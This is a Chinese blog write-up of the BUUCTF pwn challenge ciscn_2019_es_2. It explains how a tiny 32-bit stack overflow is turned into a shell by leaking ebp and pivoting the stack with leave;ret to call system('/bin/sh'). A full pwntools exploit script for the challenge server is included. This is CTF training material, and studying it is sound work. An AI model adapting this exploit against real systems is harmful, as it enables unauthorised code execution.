ciscn_2019_es_2【BUUCTF】

最新推荐文章于 2023-12-11 14:09:05 发布
最新推荐文章于 2023-12-11 14:09:05 发布
阅读量801 收藏 3
点赞数 1
分类专栏: CTF训练 PWN Linux 文章标签: PWN 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696518/article/details/126665825
版权
CTF训练 同时被 3 个专栏收录
46 篇文章 14 订阅
订阅专栏
PWN
37 篇文章 3 订阅
订阅专栏
Linux
37 篇文章 0 订阅
订阅专栏

在这里插入图片描述
开启NX,32位,动态编译,IDA查看
在这里插入图片描述在这里插入图片描述
在这里插入图片描述
我们可以看到read()函数存在溢出漏洞,但与往常溢出不同的是,该溢出仅仅只能溢出8(0x30-0x28)字节的数据,恰好就是覆盖ebp和ret地址数据,并且存在两处溢出漏洞。因此可以用read函数将system(“/bin/sh”)读到当前栈中,并返回让其执行该函数即可。
这里有两个问题,1.system(“/bin/sh”)存储地址如何得知 2. 如何返回该system地址执行函数

第一个问题:system(“/bin/sh”)存储地址如何得知

read()函数将我们输入内容读到char s[40]中,这是一个局部变量,我们无法直接知道其地址,但我们知道s地址与函数基地址ebp的偏移量是一定的,不会变化,因此只要知道了ebp地址就能知道s的地址,也同时可以通过计算知道我们输入的内容的具体位置!!!

如何知道ebp地址

在read后会执行printf函数,printf函数会将00作为截断符号,但若我们将ebp之前的内容全部填满,不让其出现阶段符号,那么printf就可以输出ebp地址了!!栈空间如图:
在这里插入图片描述

# 第一阶段
payload = b'a'*0x24 + b'BBBB'
io.recvuntil("name?")
io.send(payload) # 不要用sendline,sendline会自己加一个\n符号,导致send了29个字节
io.recvuntil("BBBB")
ebp_addr = u32(io.recv(4))
debug.info("epb_addr: "+ hex(ebp_addr))

如何通过ebp计算输入内容地址

gdb调试,发现ebp地址为0xffffcfd8,而输入的"AAAAAAAA"在0xffffcfa4,相差0x34,则ebp - 0x34 + offset 就可计算read读入的任何字符地址
在这里插入图片描述

如何返回该system地址执行函数

要知道如何返回system地址执行函数,首先要知道一个函数的执行过程,并且知道该函数的栈空间地址和参数地址

函数执行过程

该题有个hack函数,比较简单,可以使用hack函数对函数执行过程进行分析
在这里插入图片描述
二进制:
在这里插入图片描述
主要是push ebp这条,返回一个函数时,会先将返回地址压入ebp指针。并且在函数执行完毕时存在leave retn函数
因此我们需要先找到leave retn返回到system函数地址-4处,因此返回后会先将4自己压入ebp,若返回system函数地址则会将system函数地址压入ebp。这里不要和之前直接返回到一个函数混淆,之前是直接将ebp覆盖了,将ret地址修改为一个函数的地址,直接执行该函数,但我们栈溢出字节过少,这种方式不合适,因此这里是修改ebp,返回到ebp所指向的地址。构造的栈空间如图:
在这里插入图片描述

# 第二阶段
leave_ret_addr= 0x080485FD
system_addr = elf.symbols["system"]
payload = b'A'*4 + p32(system_addr) + p32(0) + p32(ebp_addr-0x38+0x10) + b"/bin/sh"
payload=payload.ljust(0x28,b'\x00') + p32(ebp_addr-0x38) + p32(leave_ret_addr)

完整代码

from pwn import *
context.log_level = True
io=remote("node4.buuoj.cn", 25309)
elf = ELF("./ciscn_2019_es_2")
# 第一阶段
payload = b'a'*0x24 + b'BBBB'
io.recvuntil("name?")
io.send(payload) # 不要用sendline,sendline会自己加一个\n符号,导致send了29个字节
io.recvuntil("BBBB")
ebp_addr = u32(io.recv(4))
log.info("epb_addr: "+ hex(ebp_addr))
# 第二阶段
leave_ret_addr= 0x080485FD
system_addr = elf.symbols["system"]
payload = b'A'*4 + p32(system_addr) + p32(0) + p32(ebp_addr-0x38+0x10) + b"/bin/sh"
payload=payload.ljust(0x28,b'\x00') + p32(ebp_addr-0x38) + p32(leave_ret_addr)
io.send(payload)
io.interactive()
Mokapeng
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
imx-es8328.rar_V2 _es8328
09-23
Headphone jack detection for Linux v2.13.6.
[BUUCTF]PWN——ciscn_2019_es_2
mcmuyanga的博客
10-27 2186
ciscn_2019_es_2 附件 步骤: 例行检查,32位程序,开启了nx保护 32位ida载入,shif+f12查看程序里的字符串,这边的“echo flag” 是个迷惑性的字符串,它只是输出了flag这4个字符,但是程序里有system函数,到时候这个函数可以直接拿来使用 system_addr=0x80048400 main函数 程序主体在vul函数里 读入0x30字节数据给s,s大小是0x28,只能溢出0x8字节,覆盖到ret,没法构造太长的rop,但是这边可以给s写入
Elasticsearch 中国开发者调查报告_2019.pdf
12-20
2010年 Elasticsearch 首个版本发布, 经过近10年的更新迭代,Elastic Stack 生态已经日渐成熟,Elastic 软件在国内拥有越来越多的用户,应用 Elasticsearch 的开发人群也不断扩大。 为了深入了解 Elasticsearch 开发者群体的现状,2019 年 11 月,Elastic 技术社区、阿里巴巴 Elasticsearch 技术团队和阿里云开发者社区三方联合发起了 Elasticsearch 开发者调研活动。
2019年欧洲车身会议蔚来ES8_Benchmark数据.pdf
01-21
2019年欧洲车身会议蔚来ES8_Benchmark数据
赛点资源数据包_嵌入式_2019.zip
06-28
赛点资源数据包_嵌入式_2019.zip
ciscn_2019_es_2
小白垃圾笔记2
05-21 644
小白垃圾做题笔记,不及建议阅读。声明,exp来自网络,调试过程自己调试,对于题目的理解仅供参考。由于本人也是小白,且pwn全靠自己摸索,所以有很多理解不到位的地方。如有错误,欢迎指正。
ciscn_2019_es_2 栈迁移(很好的例子)
weixin_46521144的博客
07-17 1168
ciscn_2019_es_2 一道很好的栈迁移例题。之前看合天讲的虽然也涉及到原理,但是例子用的是攻防世界pwn200,溢出长度还是有点多。这次只能溢出ebp和retaddr,就很典型并且有挑战性。这题没做出来,看的wp,希望下次能自己做出来。 题目给了两次溢出,这两次都是必要的。一般来说,第一次溢出需要泄露栈上地址用来给第二次做迁移使用,第二次执行栈迁移,控制ret跳转到我们所迁移的栈上,执行栈上填写的exp。由于第二次依然是在函数栈帧内输入,因此除非能自己read到bss上(通常能这样做的溢出空间也
BUUCTFPWNciscn_2019_es_2 栈迁移 栈劫持
m0_55368674的博客
01-16 598
BUUCTFPWNciscn_2019_es_2题解
[BUUCTF]-PWN:ciscn_2019_es_2解析(栈迁移)
最新发布
2301_79326813的博客
12-11 1149
答:先说明一点,我们第二次构造payload时往ebp填入ebp-0x38是为了让它在执行完函数原有的leave,ret之后ebp指向b'a'*4的头地址,但要注意这里不是输入ebp-0x28,因为第一个printf打印出来的是ebp里的内容而不是ebp的地址,通过动态调试可以知道ebp里面的内容是ebp+0x10的地址,我们打印出来的就是ebp+10的地址,这里就要填入ebp-0x38才能使ebp指向b'a'*4的头。答:首先要明白32位是通过栈传参的,这样的形式是32位的调用函数的调用规则。
gl_code.rar_V2 _opengl es_opengl es 2.0
09-24
OpenGL ES 2.0 code for Linux v2.13.6.
[栈迁移][BUUCTF][PWN] ciscn_2019_es_2
m0_50819561的博客
09-25 384
前置知识: 栈迁移概念:当存在溢出且可溢出长度不足以容纳 payload 时,可采用栈迁移。一般这种情况下,溢出仅能覆盖 ebp 、 eip 。因为原来的栈空间不足,所以要构建一个新的栈空间放下 payload ,因此称为栈迁移。 栈迁移原理:栈执行命令是从esp指向的位置想ebp指向的位置执行。正常情况退栈的操作是:esp指向ebp指向位置,ebp指向ebp里的内容所指向的位置。当遇见leave|ret命令的时候,相当于执行mov esp ebp; pop ebp; ret;作用就是将ebp指向的位置给
栈迁移(ciscn_2019_es_2)
菊花的老窝
05-03 364
栈迁移顾名思义就是将原来的程序栈迁移到另一个地方,使得我们可以将构造的 ROP 链完整的填入。那么想要修改栈的位置,那么就需要修改寄存器 esp 和 ebp 的值。想要修改 esp 和 ebp 的值,我们需要用到leave和ret两个 gadget。
【CTF】ciscn_2019_es_2
凉水的博客
07-25 981
ciscn_2019_es_2
[PWN] 栈迁移 ciscn_2019_es_2
LDX的博客
11-28 286
栈迁移 基础题目 理解 ciscn_2019_es_2
栈迁移(以ciscn_2019_es_2为例,详细分析)
fzucaicai的博客
03-12 367
这里的stdin_addr其实指向的是我们刚刚写入的''/bin/sh” 的首地址,给system()函数提供参数,但是也许有人要问的是,那为什么不把’/bin/sh‘直接写在system函数的参数位?
es 删除数据_干货 | 携程Elasticsearch数据同步实践
06-07
抱歉,我不太明白您的问题。您需要关于 Elasticsearch 的数据删除操作的信息吗?如果是的话,可以使用 Elasticsearch 提供的 Delete API 来删除单个或多个文档。例如,您可以使用以下命令删除具有指定 ID 的单个文档: ``` DELETE /my_index/_doc/1 ``` 您也可以使用 Query DSL 来删除与特定条件匹配的多个文档。例如,以下命令将删除所有 age 字段小于 30 的文档: ``` DELETE /my_index/_doc/_delete_by_query { "query": { "range": { "age": { "lt": 30 } } } } ``` 希望这可以帮助您。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值